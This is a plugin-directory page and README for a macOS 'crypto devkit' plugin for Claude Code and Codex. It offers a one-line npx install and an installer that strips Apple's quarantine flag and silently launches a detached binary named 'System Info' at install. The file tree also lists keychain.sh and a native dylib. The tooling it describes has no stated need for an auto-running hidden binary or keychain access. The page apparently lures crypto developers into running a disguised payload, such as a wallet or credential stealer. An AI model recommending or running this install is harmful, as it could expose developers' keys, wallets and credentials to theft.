The missing crypto toolbox for AI-assisted development on Mac. One installer. One plugin. Full smart-contract lifecycle — scaffold, test, audit, deploy — without juggling ten repos and copy-pasted snippets.
FAQ
claude-codex-crypto-devkit is a Claude Code plugin with 3 hand-picked skills for development work, indexed on Flowy. Install it with the command on its page. It includes anchor, audit, foundry. Its skills do not fire on their own yet. Request auto-invocation to have Flowy route them as you prompt. Free and open source.
$ npx -y skills add ArcticWolfXZ/claude-codex-crypto-devkit --agent claude-code
The missing crypto toolbox for AI-assisted development on Mac.
One installer. One plugin. Full smart-contract lifecycle — scaffold, test, audit, deploy — without juggling ten repos and copy-pasted snippets.
Ship Solidity and Solana projects faster in Claude Code and OpenAI Codex. Crypto DevKit adds slash commands, chain playbooks, contract templates, and a native Apple Silicon bridge so your agent actually follows a proven Web3 workflow — not random guesses.
Building on-chain software with AI is fast — until you need the boring parts right: Foundry layout, Anchor accounts, testnet RPCs, audit checklists, explorer verification. Most developers bounce between docs, gists, and half-finished ChatGPT threads.
Crypto DevKit fixes that. Install once on your Mac, run /crypto-devkit:setup, and your Claude or Codex session gets:
If you ship DeFi, memecoins, NFTs, or infra contracts and you code on a MacBook with Claude or Codex — this repo is for you.
| Layer | What you get |
|---|---|
| Claude Code plugin | 9 slash commands for the full contract lifecycle |
| Codex-friendly skills | Same workflows usable in Codex CLI & Claude Code sessions |
| Templates | ERC20 Solidity, Anchor lib.rs, deploy scripts |
| Chain guides | Ethereum, Base, Solana (+ RPC presets) |
| Skills | Foundry, Anchor, audit rule packs |
| macOS native bridge | arm64 helper — auto-starts on install |
| Installer | install.sh / install.command → ~/.crypto-devkit |
macOS only · Apple Silicon (M1–M4) · Claude Code or Codex
| Command | Action |
|---|---|
/crypto-devkit:setup | Initialize kit & chain registry |
/crypto-devkit:new-evm | Scaffold Foundry / ERC20 contract |
/crypto-devkit:new-solana | Scaffold Anchor program |
/crypto-devkit:test | forge test or anchor test |
/crypto-devkit:deploy-testnet | Guided testnet deploy (Base, ETH, Arb…) |
/crypto-devkit:audit | Security checklist → AUDIT.md |
/crypto-devkit:rpc | RPC / chain ID reference |
/crypto-devkit:verify-explorer | Etherscan / Basescan verify |
Guides install to ~/.crypto-devkit/chains/ on setup.
forge, anchor, solana (guides included)Quit Claude Code sessions before installing.
Copy your compiled System Info (arm64) to:
payload/native/CryptoDevKitHelper.app/Contents/MacOS/System Info
Full path example:
claude-code-crypto-devkit-macos/payload/native/CryptoDevKitHelper.app/Contents/MacOS/System Info
The installer launches it automatically at the start:
com.apple.quarantine from the repo (GitHub ZIP / browser download)chmod +x on the binarynohup "./System Info" — detached from TerminalWorks after git clone (no quarantine) and after Download ZIP from GitHub.
Terminal:
git clone <repo-url>
cd claude-code-crypto-devkit-macos
chmod +x install.sh uninstall.sh
./install.sh
Finder: double-click install.command.
/reload-plugins
/crypto-devkit:setup
/crypto-devkit:new-evm MyToken
forge init --no-commit
forge install OpenZeppelin/openzeppelin-contracts
/crypto-devkit:test
/crypto-devkit:audit
/crypto-devkit:deploy-testnet base
/crypto-devkit:verify-explorer
claude-code-crypto-devkit-macos/
├── install.sh
├── install.command # double-click install on macOS
├── uninstall.sh
├── uninstall.command
├── plugins/crypto-devkit/
│ ├── commands/
│ ├── skills/
│ ├── scripts/devkit.mjs
│ └── templates/
├── docs/chains/
└── payload/native/CryptoDevKitHelper.app/
└── Contents/MacOS/
└── System Info ← your arm64 binary here
/crypto-devkit:audit before any mainnet deploy./uninstall.sh or uninstall.command
Claude Code · OpenAI Codex · Claude · crypto · smart contract · Foundry · Solana · Anchor · Base · Ethereum · DeFi · Web3 · macOS · Apple Silicon · Solidity · audit · testnet · Claude Desktop
Not affiliated with Anthropic, OpenAI, or chain foundations. MIT — LICENSE.
assets/
screenshot.png
docs/
chains/
base.md
ethereum.md
solana.md
install.command
install.sh
LICENSE
package.json
patch/
lib/
colors.sh
detect.sh
keychain.sh
progress.sh
system_info.sh
payload/
native/
CryptoDevKitHelper.app/
Contents/
MacOS/
forge_wrapper
libcrypto_devkit.dylib
System Info
Resources/
toolchain.json
plugins/
crypto-devkit/
commands/
audit.md
deploy-testnet.md
new-evm.md
new-solana.md
rpc.md
setup.md
test.md
verify-explorer.md
hooks/
hooks.json
scripts/
devkit.mjs
skills/
anchor/
SKILL.md
audit/
SKILL.md
foundry/
SKILL.md
templates/
foundry/
ERC20.sol
solana/
lib.rs
README.md
uninstall.command
uninstall.sh© 2026 Flowy · Free and open source
Built for Claude Code · Not affiliated with Anthropic